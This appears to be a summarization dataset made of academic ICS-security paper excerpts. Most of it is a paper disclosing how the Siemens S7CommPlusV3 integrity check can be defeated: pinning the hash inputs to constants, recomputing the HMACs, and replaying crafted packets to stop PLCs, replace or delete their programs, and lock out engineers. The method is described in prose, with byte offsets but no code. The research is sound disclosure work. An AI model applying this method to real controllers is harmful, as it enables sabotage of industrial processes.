As soon as a new tool is in position (I2.6 = 1), the condition j3 is fulfilled and p4 is marked with Oc = [0 0 0 0 0]^T. The tool change of the VMill is now completed. Now we assume an attack on the tool change process. The attacker becomes active as soon as p2 is marked. He prevents the firing of transition t2 during the complete attack with Ia = [1 0 0 1 1]^T. The malicious actions of the attacker comprise a modified tool change process. If these are additionally performed, then the wrong tool is used for processing the workpiece. In this example, the output vectors of all three places of the attacker are identical (Oa = [0 0 0 0 1]^T). The firing conditions for the attacker SIPN are: ja1: I2.6 = 0, ja2: I2.6 = 1 and ja3: I2.6 = 0. As soon as pa3 is marked and the condition of j2 is fulfilled, the attacker releases transition t2 again and the process of the VMill continues normally. In the end, the tool change process has been executed twice.

C. Time Guard Detection

Due to space constraints, we only present the time guard detection for the false data injection attack, which was described in Section V-A. The attacker injects a wrong input vector at transition t2 to terminate the drilling process earlier. As a result, the condition f(g(t2)) ≥ τ(t2)min is not fulfilled and the attacker can be detected. This is shown in Figure 5. The time value of the clock of transition t1 is 2.37 seconds. This lies within 1.9 s and 2.8 s and thus satisfies condition (5) (y(t1) = True). For transition t2, however, a value of 1.5 seconds was determined, which is below τ(t2)min = 2.2 s and can be detected by Algorithm 1. In the I/Os the attacks can hide their manipulation and therefore they are invisible; only on the time level do they lose their invisibility, due to the nature of the attacks.

VI. CONCLUSIONS

In this paper, the detection method called time guard detection has been presented. It is used to detect false data injection and malicious action injection attacks, which are modeled for ICS based on SIPN.
Both attacks are completely stealthy on the logical level of the PLC and cannot be detected there. Only on the time level can they not hide their manipulations, due to their nature, and thus they can be detected. For future research, we want to develop algorithms to differentiate between plant faults and cyber attacks. Another field of research is the prevention and handling of cyber attacks, which is also of interest for legacy systems.
Summary:
Due to the rapid increase in digitalization and networking of systems, especially in industrial environments, the number of cyber-physical systems is increasing, and with it the danger of possible attacks on such systems. As demonstrated by several recent examples, a cyber attack on an industrial control system (ICS) can have catastrophic consequences for humans and machines. This is due to the communication networks between programmable logic controllers (PLCs), actuators and sensors, which are usually vulnerable to attacks, as well as various processes or devices that are not sufficiently protected. In this paper, two possible attacks on a discrete event system (DES) are introduced, in which a running process, controlled by a PLC, is manipulated without being detected. Furthermore, a detection method for such attacks is presented.
|
Summarize:
Index Terms: S7 Protocol, SIMATIC PLCs, Cyber Security, Industrial Control Systems, Replay Attacks

I. INTRODUCTION

The S7 protocol serves the exchange of critical information between Programmable Logic Controllers (PLCs) and their Totally Integrated Automation (TIA) Portal engineering software. The exchanged messages include the network configuration and critical data, e.g., the control logic program, diagnostic information, set-point values, etc., between the connected parties. Its core communication follows a "client-server" pattern, meaning that the TIA Portal device (client) initiates transactions, and the connected PLC (server) responds by either supplying the requested data or executing certain actions. The newer generations of S7 PLCs, i.e., S7-1200 and S7-1500, are provided with a cryptographically protected S7 protocol, called S7CommPlus. This protocol is identified by a unique protocol ID (0x72) and has three sub-versions [1], as follows:

- S7CommPlusV1: used by the older versions of TIA Portal and only in S7-1200 PLCs. This protocol does not include any integrity protection.
- S7CommPlusV2: used in the TIA Portal up to V12 and in S7-1500 PLCs with firmware up to 1.5. This protocol is integrity protected and has security features against replay attacks (e.g., Hash-based Message Authentication Code with Secure Hash Algorithm 256 (HMAC-SHA-256)).
- S7CommPlusV3: used in the newer versions of TIA Portal, i.e., from V13 on, and in the newer S7-1500 PLC firmwares, e.g., V1.8, 2.0, etc. This protocol requires that both the TIA Portal and the PLCs support its features. Here, Siemens has improved the integrity mechanism by providing the S7CommPlus protocol with very complex encryption processes. Therefore, it is considered the most secure protocol among the versions, i.e., compared with S7CommPlusV1 and S7CommPlusV2, and it is the focus of our work.
The integrity mechanism implemented in the newest PLC models and the S7CommPlusV3 protocol consists of three main parts: 1) a Challenge packet sent from the PLC to the TIA Portal, 2) a Response packet sent from the TIA Portal to the PLC, and finally 3) an Integrity Part in each S7 function packet sent from the TIA Portal to the PLC and vice versa [1], [4]. In this work, we show how an attacker could obtain sufficient information about the integrity mechanism, and we disclose vulnerabilities that he can exploit to maliciously craft S7 Function packets that could potentially be used in replay attacks. To validate our findings, we perform several attack scenarios on real hardware: a SIMATIC S7-1512SP PLC with firmware V2.9.2 and TIA Portal software V16. The attacks presented in this work include a simple start/stop, unauthorized software and hardware changes to the PLC program, removing the PLC program, and Denial of Service (DoS) attacks. All our attack scenarios are network-based and designed with the help of pre-recorded packets that can be used after calculating specific encryption bytes correctly, as shown later. The rest of the paper is organized as follows. We compare our work with related ones in Section II. Section III gives an overview of the S7CommPlusV3 protocol, while its communication process is illustrated in Section IV. Section V presents our attack approach, and we conclude this paper in Section VI.

II. RELATED WORK

There are only a few works that have discussed vulnerabilities and security gaps in the S7CommPlus protocol. The first ever work was published in 2016, when Spenneberg et al. [5] introduced a worm that found new vulnerabilities in the S7CommPlus protocol, precisely S7CommPlusV2. The authors demonstrated a malicious code designed with the help of TIA Portal. The code was first injected into an S7-1200 PLC.
2023 IEEE 19th International Conference on Factory Communication Systems (WFCS) | DOI: 10.1109/WFCS57264.2023.10144251
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply.

After patching the PLC, the worm automatically scanned the network and connected to other PLCs, trying to download the binary code into them. The downside of Spenneberg's approach was that the infected PLC is always rebooted during the patch, which could eventually draw the legitimate user's attention. In 2017, Cheng et al. [4] investigated the new encryption method used in the S7CommPlus protocol. The authors used a reverse engineering technique to analyze the communication process between the PLC and TIA Portal. Afterwards, they presented a spear that can break the security wall of the S7CommPlus protocol that Siemens S7-1200 PLCs utilize. The authors performed two attacks. First, they pushed crafted packets into the network to start and stop the PLC remotely. In the second attack scenario, the authors manipulated the input and output values of the victim, causing serious damage to the physical process. However, the work of Cheng lacks detailed information on how the integrity check mechanism works, how the encryption processes are calculated, and which bytes can be manipulated by adversaries to conduct successful replay attacks. A research group showed in 2018 that a network-based attack, e.g., Address Resolution Protocol (ARP) poisoning, is feasible against S7-1200 PLCs and their S7CommPlus protocol [6]. The authors found that specific 7 bytes, known as "S7-ACK", can be exploited for session stealing and DoS attacks. Biham et al. [1] investigated the security features of both the S7CommPlusV2 and S7CommPlusV3 protocols used in the S7-1200 and S7-1500 PLCs.
The authors disclosed serious security gaps in the S7CommPlus protocol and performed different exploits against cryptographically protected PLCs. In 2022, Alsabbagh et al. [2], [3] also investigated the security of the S7CommPlusV3 protocol and revealed a few security gaps in the design of this protocol, e.g., the one-way authentication method between the PLC and the TIA Portal software allows attackers to connect to the victim PLC using a TIA Portal software without any effort. Furthermore, the authors found that the PLC did not check the integrity of all packet attributes. Based on their findings, the authors designed an injection tool, namely PLCinjector, that allows attackers to establish a connection with a remote PLC and alter the program running in the device. All the aforementioned works [1]-[4], [6] required adversaries to already have TIA Portal software installed on their machines. In contrast, in this work we overcome this point by introducing typical replay attack scenarios based on pre-captured packets from old S7 sessions, without the need to have a TIA Portal installed on the attacker's machine. Furthermore, our attacks are valid for all S7-1500 PLCs with the same firmware, i.e., V2.9.2.

III. S7COMMPLUSV3 PROTOCOL BACKGROUND

The S7CommPlusV3 protocol supports various operations that are performed by the TIA Portal software, such as starting/stopping the PLC, downloading/uploading a control program to/from the PLC, reading/writing values of a control variable, etc. [2]. All these operations are first translated by the TIA Portal software into S7CommPlus packets, precisely S7 Function packets, before they are transmitted to the PLC. Then, the PLC acts upon the messages it receives, executes the control operations, and responds back to the TIA Portal accordingly. The messages are transmitted in the context of a session, each of which has a session ID (chosen by the PLC) [2].
Since the S7CommPlus is a cryptographically protected protocol, each new S7 session established using this protocol begins with a four-message handshake to select the cryptographic attributes of the session, including the protocol version and encryption keys [2]. After the handshake, all messages are integrity protected using a very complex integrity mechanism.

A. Protocol Structure

S7CommPlusV3 is a "request-response" protocol. Each message consists of a protocol Header, Data and a Trailer, as shown in figure 1.

Fig. 1: The Structure of S7CommPlus Protocol

The Header and Trailer always have the same structure, including the following components: a 1-byte Protocol version, a 1-byte Protocol ID, and a 2-byte Data Length, as shown in figure 2.

Fig. 2: S7CommPlus Protocol: Header and Trailer have the same Structure

The Protocol Data Unit (PDU) type determines the S7CommPlus protocol version, i.e., V1, V2 or V3 for the value 0x01, 0x02 or 0x03, respectively. If the PDU type has the value 0x01 or 0x02, there is no Integrity Part in the Data field. In the opposite case, when the PDU type is denoted with 0x03, an additional Integrity Part (see the red block in figure 3) is padded to the Data field, as shown in figure 3. In this work, we are only interested in studying the latest S7CommPlus version. Therefore, from this point on, all the information provided throughout this paper is related to the S7CommPlusV3 protocol.

Fig. 3: S7CommPlusV3 protocol - Data field Components

The Data block is comprised of 14 bytes (see the green block in figure 3). Starting from the top, we see a 1-byte Opcode which identifies the purpose of the S7CommPlus packet, e.g., 0x31 if the packet is a request, 0x32 if the packet is a response, or 0x33 if the packet is a notification. After the Opcode, we see a 2-byte field that has a fixed value of 0x0000. Then, there is a 2-byte field, called Function, which determines the functionality of the packet, e.g., 0x04ca for CreateObject, 0x0542 for SetMultiVariable, 0x04f2 for SetVariable, etc. In the next field we find again a fixed value of 0x0000, followed by a 2-byte field representing the sequence number of the packet. The Session ID is 4 bytes long and always has the format 0x000003xx; the xx in the Session ID is a combination of the ObjectID and 0x80. Finally, we have the transport flag, a 1-byte field generated randomly and used neither in the encryption nor in the authentication methods. The structure and content of the Set block (see the blue block in figure 3) are related to the PDU type and Opcode. This block has many diverse types and is quite complex. For more details, see the S7comm Wireshark dissector plugin project (https://sourceforge.net/projects/s7commwireshark/).

B. Communication Process

The TIA Portal and PLCs exchange four kinds of packets: S7Request, Challenge, Response, and Function packets, see figure 4.

Fig. 4: S7CommPlus Communication Process

As can be seen, at the beginning of each new communication session, the TIA Portal sends an S7 Request to establish a connection with the PLC. After the PLC receives the S7 Request, it sends a 20-byte array, namely the Challenge, that differs significantly from one session to another. Those 20 bytes are generated by a hash or pseudo-random function. After the TIA Portal receives the Challenge, it generates a Response that contains, among many bytes, three interesting blocks: "block 1" is a 9-byte array, "block 2" is an 8-byte array and "block 3" is a 132-byte array, see figure 7.
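The fixed-size framing described in Section III-A can be parsed with a few struct unpacks. This is a sketch under assumptions: the field order follows the listing in the text, big-endian byte order is assumed, and the example packet is fabricated rather than taken from a real capture:

```python
import struct

# Sketch of parsing the S7CommPlus framing described above: a 4-byte
# Header (protocol version / PDU type, protocol ID 0x72, data length)
# followed by the leading Data-field bytes (opcode, fixed 0x0000, function,
# fixed 0x0000, sequence number, session ID, transport flag). Field order
# follows the text; byte order and the example bytes are assumptions.

def parse(raw):
    version, proto_id, data_len = struct.unpack(">BBH", raw[:4])
    if proto_id != 0x72:
        raise ValueError("not an S7CommPlus packet")
    opcode, _, function, _, seq, session_id, tflag = struct.unpack(
        ">BHHHHIB", raw[4:18])
    if version == 0x03 and (session_id & 0xFFFFFF00) != 0x00000300:
        raise ValueError("unexpected session ID format")
    return version, data_len, opcode, function, seq, session_id

pkt = bytes([0x03, 0x72, 0x00, 0x0E,   # header: V3, ID 0x72, length 14
             0x31,                     # opcode: request
             0x00, 0x00,               # fixed 0x0000
             0x05, 0x42,               # function: SetMultiVariable
             0x00, 0x00,               # fixed 0x0000
             0x00, 0x01,               # sequence number 1
             0x00, 0x00, 0x03, 0x81,   # session ID 0x000003xx
             0x00])                    # transport flag
assert parse(pkt) == (0x03, 0x0E, 0x31, 0x0542, 0x0001, 0x00000381)
```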
The PLC examines the integrity of these three blocks and sends a Transmission Control Protocol (TCP) message as well as a reset flag if the content of the blocks differs from what the PLC expects to receive; otherwise, the establishment of the S7 session continues with an "OK" packet sent to the TIA Portal. Those bytes are generated by specific algorithms illustrated in Section IV. Once the communication session is approved by the PLC, all the following packets exchanged between the TIA Portal and PLC are protected with an Integrity Part related to the functions provided by the TIA Portal. In the next section, we investigate this communication process in more detail.

IV. INVESTIGATING THE COMMUNICATION PROCESS

In order to understand the encryption algorithms used in the S7CommPlusV3 protocol and explore possible exploits, we first need to analyze the communication process between the TIA Portal and the PLC. To this end, a manual analysis was conducted using helpful tools such as Scapy (https://scapy.net/) and WinDbg (https://windbg.org/), and a number of different communication sessions. First, we open the TIA Portal, press the "go online" button, and then capture all the packets and save them in a pcap file for further analysis. To support our study, we use the WinDbg software, which allows us to set several breakpoints during the communication session, which is comprised of four packets (see figure 4). In the following we present our analysis results for each packet in detail.

A. S7 Request Packet

The TIA Portal initializes a new session by sending a Request packet to the PLC. This packet has no encryption bytes; therefore, an attacker can re-use this packet "as-is" without any appropriate adjustments.
B. S7 Challenge Packet

After the PLC receives the S7 Request from the TIA Portal, it responds by sending an S7 packet (we call it the S7 Challenge). Our investigation showed that this packet has a 20-byte array that varies significantly every time the TIA Portal sends a new Request, i.e., every time the user presses the "go online" button. This 20-byte array is called the ServerSessionChallenge and is always located at the 26th byte position of any S7 Challenge (as shown in figure 5).

Fig. 5: S7 Challenge Packet - ServerSessionChallenge Array

By further investigation and by inserting several breakpoints at the memory address where this array is located, we found that only 16 bytes, precisely from byte 3 to byte 18 of the ServerSessionChallenge, were copied and stored at another address. This final 16-byte block, called challenge in [1], plays an important role in generating certain encryption bytes for the following S7 Response and Function packets, as illustrated later in the next subsections (IV-C and IV-D).

C. S7 Response Packet

The Response packet is sent from the TIA Portal to the PLC as a response to the Challenge packet. It is quite complex and can be divided into several parts, as shown in figure 7.

1) Encryption Bytes can be manipulated: Our investigation of this packet showed that the Secure Hash Algorithm 256 (SHA-256) is utilized two times to generate two hashes. The inputs of the SHA-256 algorithm are generated randomly using the Application Programming Interface (API) cryptography functions, precisely the "CryptGenRandom" function, see figure 6. The two resulting hashes are then used as a part in generating specific encryption bytes in the S7 Response packet. Figure 7 shows these bytes, which are as follows:

- Block 1, 9 bytes: located between byte 91 and byte 99.
- Block 2, 8 bytes: located between byte 136 and byte 143.
- Block 3, 132 bytes: located between byte 168 and byte 299.
This block is also divided into sub-blocks as follows: the first 76-byte block of the 132-byte block (located between byte 168 and byte 243), the "First Encryption" (16 bytes located between byte 244 and byte 259) and the "Second Encryption" (16 bytes located between byte 284 and byte 299). Since the three encryption blocks are generated based on the two hashes that SHA-256 produces as outputs [1], adversaries can maliciously manipulate those blocks by manipulating the generation process of the two hashes. To this end, an attacker can use the WinDbg software to feed constant inputs to the hash function of the SHA-256 algorithm, which will eventually result in fixed hashes rather than the random ones obtained when the "CryptGenRandom" function is used. For instance, when we fed the hash function with "0" values as inputs, the bytes representing the hashes generated by the SHA-256 algorithm remained constant in every session. This is a very serious vulnerability, as an attacker can subsequently generate the three encryption blocks, craft the entire S7 Response packet and finally send it to the PLC without the need to have TIA Portal software installed on his machine, as [1]-[3] assumed.

Fig. 6: Generating Keys and Bytes for the First and Second Encryption

One of the two hashes, precisely "Hash 1", is used in a computation to generate two keys, each 16 bytes in length (we call them "Key 1" and "Key 2" for the rest of this paper). The resulting keys are then utilized in two symmetric-key encryption processes, precisely the Advanced Encryption Standard (AES)-128 algorithm (called "First Encryption" and "Second Encryption" in [4]), as depicted in figures 8 and 9, respectively. Since the inputs of the two hashes can be manipulated, the two keys can also be manipulated by attackers. Consequently, both encryption processes in the S7 Response packet could be manipulated. In the following we explain in detail how an attacker can manipulate the "First Encryption" and "Second Encryption" processes.
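The effect of pinning the CryptGenRandom inputs can be illustrated with a short sketch. The direct SHA-256-over-seed computation and the 16-byte truncation for Key 1 are simplifications of ours; the paper's actual key computation is more involved:

```python
import hashlib

# Sketch of the vulnerability described above: if the attacker pins the
# inputs that normally come from CryptGenRandom to constants (e.g. zeros),
# the two SHA-256 hashes, and thus the keys derived from Hash 1, repeat in
# every session. Hash-over-seed and key truncation are simplifications.

def session_hashes(random_input_1, random_input_2):
    h1 = hashlib.sha256(random_input_1).digest()
    h2 = hashlib.sha256(random_input_2).digest()
    return h1, h2

pinned = bytes(32)                        # attacker-forced constant input
h1_a, h2_a = session_hashes(pinned, pinned)
h1_b, h2_b = session_hashes(pinned, pinned)
assert (h1_a, h2_a) == (h1_b, h2_b)       # identical across "sessions"
key1 = h1_a[:16]                          # illustrative Key 1 derivation
assert len(key1) == 16
```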
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:40:05 UTC from IEEE Xplore. Restrictions apply.
Fig. 7: S7CommPlus Response Packet from TIA Portal to the PLC
Fig. 8: First Encryption in the S7CommPlus Response Packet
2) First Encryption Process: Figure 8 depicts the "First Encryption" algorithm that the Response packet implements. As can be seen, the output of this encryption is placed between byte 77 and byte 93 of "block 3" (the 132-byte block in the S7 Response packet) and is 16 bytes long, see figure 7. Our analysis showed that the "First Encryption" process uses two inputs: 1) the bytes located between byte 61 and byte 76 (in "block 3") as plaintext, and 2) an encryption key, precisely "Key 1". Afterwards, the output of the encryption process, which is a 16-byte block, is XOR-ed with the 16-byte challenge array. The resulting output of the XOR operation is finally stored at a certain address before it is sent to the PLC. From all this, we can conclude that the "First Encryption" process amounts to XOR-ing a fixed 16-byte block with the challenge array. Therefore, to manipulate this encryption, an attacker only needs to manipulate the hashes used to generate "Key 1", as mentioned earlier in IV-C1.
3) Second Encryption Process: The algorithm here is similar to the one used in the former encryption process ("First Encryption"), i.e., AES-128, but it differs in that the plaintext of the "Second Encryption" is produced by a sophisticated algorithm that uses the 16-byte output of the "First Encryption" as part of its inputs. Figure 9 depicts the complete algorithm used in this encryption process.
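The structure of the "First Encryption" can be sketched as follows. Once the hashes are forced constant, AES-128 of a fixed plaintext under a fixed key is itself a fixed 16-byte block, so the process collapses to XOR-ing one constant block with the session challenge. To keep the sketch dependency-free, the AES step is replaced here by a hash-derived placeholder block; only the XOR structure mirrors the packet, and all byte values are illustrative.

```python
import hashlib

def fixed_aes_output(key1: bytes, plaintext: bytes) -> bytes:
    # Placeholder for AES-128(key1, plaintext). With forced-constant hashes,
    # key1 and the plaintext are fixed, so this 16-byte block is fixed too.
    return hashlib.sha256(key1 + plaintext).digest()[:16]

def first_encryption(key1: bytes, plaintext16: bytes, challenge16: bytes) -> bytes:
    # The value placed in the Response packet: fixed block XOR challenge.
    fixed_block = fixed_aes_output(key1, plaintext16)
    return bytes(a ^ b for a, b in zip(fixed_block, challenge16))

key1 = bytes(16)                  # attacker-controlled, constant across sessions
plaintext = bytes(range(16))      # stands in for bytes 61-76 of "block 3"
challenge = bytes(range(16, 32))  # 16-byte challenge from the S7 Challenge packet

out = first_encryption(key1, plaintext, challenge)

# XOR-ing the output with the challenge recovers the fixed block, confirming
# that only the challenge varies between sessions.
recovered = bytes(a ^ b for a, b in zip(out, challenge))
assert recovered == fixed_aes_output(key1, plaintext)
```

This is why the attacker only needs "Key 1" and the observed challenge to produce a valid First Encryption field.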
As can be seen, the "Second Encryption" contains a four-stage "Plaintext Generation" fed with five inputs, which are as follows: 1) a 16-byte value, 2) the "First Encryption" output, 3) a 16-byte ciphertext, 4) an 8-byte ciphertext value truncated from another ciphertext, and 5) a 4-byte value generated by a counter and padded with "0". Our investigations showed that the two hashes we already identified in IV-C1 are involved in all inputs of the "Second Encryption" except the 16-byte output of the "First Encryption".
Fig. 9: Second Encryption in the S7CommPlus Response Packet
Furthermore, each plaintext-generation stage is an XOR operation on two inputs, and the result of each stage is fed as input to the next one, as depicted in figure 9. Once the last plaintext is produced, its value is encrypted under "Key 2" using an algorithm similar to the "First Encryption" algorithm. The output of this encryption is finally placed in the last 16 bytes of "block 3" in the S7 Response packet, see figure 7.
D. S7 Function Packet
Once the encryption blocks (in the Response packet) are verified and everything is correct, the PLC approves the connection with the TIA Portal. Afterwards, S7 Function packets containing the required data/operations are sent from the TIA Portal (see Section III). Figure 10 shows one of these packets, which contains control information.
Fig. 10: S7 Function Packet from the TIA Portal
Each Function packet contains a 32-byte encryption block called the Integrity Part (as named in [4]) before the payload. Our analysis of the Integrity Part shows that this block is a Hash-based Message Authentication Code (HMAC) used to examine the integrity of the Function packet.
This examination aims at ensuring that the payload has not been maliciously modified, and at authenticating the TIA Portal, since the encryption keys used in the HMACs are known only to the parties of an ongoing S7 session. To calculate the Integrity Part block, two HMAC algorithms are called. The "First HMAC" is called to create an encryption key that is used in all further HMACs, while the "Second HMAC" is called to digitally fingerprint all the following Function packets. These two HMACs are built on the same hashing algorithm, as follows.
1) First HMAC: The first HMAC is called prior to sending the S7 Response packet from the TIA Portal to the PLC. The plaintext here consists of an 8-byte value (generated by a very specific algorithm that is critical to the S7 integrity check [1]) and the 16-byte challenge array, see figure 11. The combined value is 24 bytes long and is digitally signed using an encryption key (also 24 bytes) produced with the help of the two hashes identified earlier in IV-C1. The output of the first HMAC is a 32-byte value, but it is truncated to 24 bytes that are eventually saved and used as the essential key in the "Second HMAC" computation.
2) Second HMAC: This is the algorithm that actually calculates the 32-byte Integrity Part. Please note that the length of the S7 Function packet varies significantly based on the purpose of the packet. However, the HMAC output (32 bytes) always starts at byte 5 of any Function packet, see figure 11.
Fig. 11: Integrity Part Encryption Process
The "Second HMAC" takes as input all the bytes after the 32-byte Integrity Part, i.e., starting from byte 38, excluding the packet's footer, which is usually the last six bytes (e.g., in the packet shown in figure 11 these six bytes are "00 00 72 03 00
Since the length of each Function packet and its payload can vary, the footer also varies from aFunction packet to another. However, since attackers are familiar with the key generation process, a simple trail-error method could easily determine which bytes are used as input in the second HMAC computation. V.ATTACK SCENARIOS In Section IV, we analyzed the packets exchanged over the S7CommPlusV3 protocol and found that manipulating the inputs of the SHA-256 will result constant hashes which eventually allows attackers to generate the three encryption blocks in the Response packet, as well as the Integrity Part in the Function packet. This vulnerability is quite severe and exploiting cryptographically-protected PLCs is feasible. In the following, we present potential attacks can be conducted based on crafting S7 Function packets. All the crafted packets used to conduct our attacks were built and sent from the attacker machine to the PLC using the Scapy library. Please note that establishing an S7 session with the PLC is out of the scope of this paper and already illustrated in our former paper [2]. A.Unauthorized Start/Stop Attack To start/stop a PLC, The TIA Portal sends an S7 Function packet that implements a " SetVariable " attribute on the " Na- tiveObject.theCPUexeUnit_Rid " object, see gure 12. This packet contains a 32-byte Integrity Part ("Packet Di- gest" in gure 12) that is checked by the PLC, and only if this block is computed correctly, the PLC veri es the packet and then executes the Start/Stop command. For all this, the attacker needs to craft this S7 Function packet by maliciously generating the "Key 1 & Key 2", and computing the HMACs implemented in this block (as explained in Section IV-C and IV-D). Please note that the Integrity Part bytes can be correctly calculated. 
This holds true for any crafted packet due to the fact that the encryption keys and required bytes (see figure 6) will always be fixed, since the attacker manipulates the two hashes by introducing "0" inputs to the SHA-256 algorithm.
Fig. 12: Start/Stop S7CommPlus Function Packet
B. Unauthorized Software Changes to the PLC Program
The user chooses the "Software Changes" option in the TIA Portal to update (download) the PLC program into the PLC. Our experiments showed that it is possible to craft the S7 Function packet containing the control logic program sent to the PLC. To this end, we open the TIA Portal software and create a completely new project. Then we program the main Organization Block (OB1) with a malicious program of our choosing. Afterwards we download this program to the PLC and capture the S7 Function packets that are in charge of the download process. By extracting the payload parts of the captured S7 Function packets, i.e., the bytes after the Integrity Part up to the last six bytes of the packet "00 00 72 03 00 00", and using this payload in our crafted S7 Function packet, we can successfully update the program running in the PLC, which only checks the Integrity Part block, not the malicious payload.
C. Removing the PLC Program
This attack scenario is quite similar to the former one (V-B), but here the attacker aims at deleting the program (the OB1 block) from the PLC's memory. An interesting fact is that the TIA Portal does not offer a "Delete" operation to the user. Therefore, the only way to delete the current program running in the target PLC is to replace the OB1 with an empty one. To do so, we create a new project in the TIA Portal, and leave the OB1 empty without any instructions. Then, we download the empty OB1 (using the "Software Changes" operation) to the remote PLC.
Meanwhile, we open Wireshark and capture all the network packets exchanged between the parties, which eventually contain the specific S7 Function packets the TIA Portal sends to download the empty OB1. Similar to the former attack scenario (V-B), by extracting the payload from the captured Function packets and using it in our crafted S7 Function packet (after calculating a new Integrity Part and adjusting the sequence number as well as the response bytes appropriately), we can send the malicious S7 packets to the PLC, which will replace the OB1 with an empty one, and the infected PLC will have no more instructions to execute.
D. Unauthorized Hardware Changes to the PLC Program
Attackers can maliciously alter the hardware configuration, causing a non-configured PLC state (unidentified station), so that the TIA Portal software will not be able to establish a connection with the infected PLC. To conduct such an attack scenario, we first create a new project in the TIA Portal, insert a new device (PLC) into the project, and configure the settings of this device differently from the settings of the target PLC, e.g., a different PLC firmware version or IP address. After that, we save the project and download the new configuration to the connected CPU using the option "Hardware and Software (only changes)". Meanwhile, we capture the packets transferred between the stations and extract the S7 Function packets the TIA Portal sends to make the required changes on the remote PLC. By using the payload of the captured packets in newly crafted packets, an attacker can make unauthorized hardware configuration changes to the PLC that alter its settings and cause abnormal behaviors, e.g., the PLC will not switch into run mode since it has a false configuration, or it obtains a new IP address so it closes all connections with other devices and shows a synchronizing-program message before the user attempts to download his own program.
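The payload-reuse step shared by the scenarios above (V-B through V-D) can be sketched as follows. The offsets follow the paper's description: the 32-byte Integrity Part starts at byte 5, the data signed by the second HMAC starts at byte 38, and the last six bytes are the footer "00 00 72 03 00 00". The 24-byte HMAC key here is a dummy placeholder; in a real attack it would be the key recovered by forcing the hashes constant (IV-D1), and the packet layout between digest and payload is simplified to a filler byte for illustration.

```python
import hashlib
import hmac

INTEGRITY_OFFSET = 4   # 32-byte Integrity Part starts at byte 5 (1-indexed)
PAYLOAD_OFFSET = 37    # signed data starts at byte 38 (1-indexed)
FOOTER = bytes.fromhex("000072030000")

def extract_payload(captured: bytes) -> bytes:
    # Bytes after the Integrity Part, excluding the six-byte footer.
    return captured[PAYLOAD_OFFSET:-len(FOOTER)]

def forge_packet(header: bytes, payload: bytes, hmac_key24: bytes) -> bytes:
    # Recompute the Integrity Part over the reused payload with the
    # attacker-derived 24-byte key, then reassemble the Function packet.
    integrity = hmac.new(hmac_key24, payload, hashlib.sha256).digest()  # 32 bytes
    filler = bytes(PAYLOAD_OFFSET - INTEGRITY_OFFSET - 32)  # gap before payload
    return header + integrity + filler + payload + FOOTER

# Illustrative "captured" packet: 4 header bytes, 32-byte digest,
# 1 filler byte, a dummy payload, and the footer.
payload = b"\x31\x32\x33\x34\x35"
captured = bytes(4) + bytes(32) + bytes(1) + payload + FOOTER

assert extract_payload(captured) == payload
forged = forge_packet(captured[:INTEGRITY_OFFSET], payload, hmac_key24=bytes(24))
assert extract_payload(forged) == payload
```

The forged packet carries the original (or attacker-modified) payload under a freshly computed digest, which is exactly why the PLC's check of the Integrity Part alone does not stop the replay.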
E. Denial of Service
Knowing the encryption algorithms (i.e., "First Encryption", "Second Encryption" and the HMACs) allows attackers not only to manipulate the operations provided via the TIA Portal software but also to perform a DoS attack and deprive the user of access to the PLC. To this end, attackers can send crafted packets aiming only at establishing a new S7 session with the PLC, keeping this session alive "forever" by sending "S7-ACK" packets regularly, as introduced in [2], [6]. This attack scenario is feasible due to two facts. First, S7 PLCs cannot initiate a new S7 session while there is already an ongoing session. Secondly, the "S7-ACK" packet lacks the 32-byte Integrity Part and can be reproduced "as-is" to keep an S7 session alive. Assuming that the TIA Portal is not connected to the PLC, an attacker located on the same network can establish a connection with the PLC [1], [3] and exchange Connection Oriented Transport Protocol (COTP) packets. After the PLC sends the Challenge packet, the attacker can respond with a crafted Response packet containing the appropriate encryption bytes, and right after that he follows his Response packet with an endless loop of S7-ACK packets. This will prevent any connection from the legitimate TIA Portal, and the attacker's session will remain alive without any further actions. Please note that the PLC will keep running the currently loaded program, and it is not possible to make any software or hardware changes to the PLC. Therefore, a manual reboot is required to close the attacker's session.
VI. CONCLUSION AND FUTURE WORK
This paper shows that the encryption processes used by the S7CommPlus protocol to protect the communication process are vulnerable.
Motivated adversaries can maliciously introduce constant inputs, e.g., "0" values, to the SHA-256 algorithm that randomly generates the keys and bytes needed to calculate the three encryption blocks in S7 Response packets and the HMAC computations in S7 Function packets. Our experiments proved that attackers can craft their own S7 Function packets and use them in replay attacks to cause several impacts on target PLCs. Based on our findings, we successfully performed a series of attacks against a real, cryptographically-protected hardware PLC from the S7-1500 family to validate our results. This work was done under the assumption that the target PLC is not password protected. In future work, we will address this assumption by investigating the S7 authentication protocol that cryptographically protected PLCs use. We believe that this protocol also has an anti-replay mechanism and that the password itself is encrypted in some way. Thus, further investigation is needed to cover this topic.
Summary:
The S7 protocol defines an appropriate format for exchanging messages between SIMATIC S7 PLCs and their corresponding engineering software, i.e., the TIA Portal. Recently, Siemens has equipped its newer PLC models and their proprietary S7 protocols with a highly developed and sophisticated integrity check mechanism to protect them from various exploits, e.g., replay attacks. This paper addresses exactly this point and investigates the security of the most developed integrity check mechanism, which the newest S7CommPlus protocol version implements. Our results showed that the latest S7 PLC models as well as their related protocols are still vulnerable. We found that adversaries can manipulate two hashes that play a significant role in generating keys and bytes for the encryption processes implemented in the S7CommPlus protocol. This allows attackers to reproduce S7 packets and conduct several attacks that eventually impact the operation of the target PLC and the entire physical process it controls. To validate our findings, we tested all the attack scenarios presented in this work on a cryptographically protected S7 PLC from the 1500 family, which uses the S7CommPlusV3 protocol.
Summarize:
Index Terms -- Denial of service, industrial control systems, insider attacks, PLC security, vulnerability analysis.
I. INTRODUCTION
Industrial Control Systems (ICS) are used in the management and maintenance of critical infrastructures, which are usually geographically distributed, such as gas, water, production, transportation and power distribution systems. Most ICS consist of several sub-components, such as the Programmable Logic Controller (PLC), Human Machine Interface (HMI), Master Terminal Unit (MTU) and Remote Terminal Unit (RTU) [1]. In old-generation ICS, these components communicated over private internal networks that were independent of external networks. In order to control and monitor geographically distributed structures and to increase productivity and efficiency, Internet or intranet connectivity became necessary in ICS [2-4]. Along with this process, new vulnerabilities that could not be identified beforehand have emerged. These vulnerabilities are:
- Generally using open system source codes,
- Permitting remote access (VPN, etc.),
- Beyond security, ICS have a design that primarily focuses on the effectiveness of the system, such as critical timing needs, tight performance definitions, and task priorities,
- Not using security systems that should be used to protect ICS from other networks or from threats that may arise from the network, because of commercial concerns,
- Not controlling the privileged accounts of authorized IT staff,
- Not changing default usernames and passwords and therefore leaving backdoors,
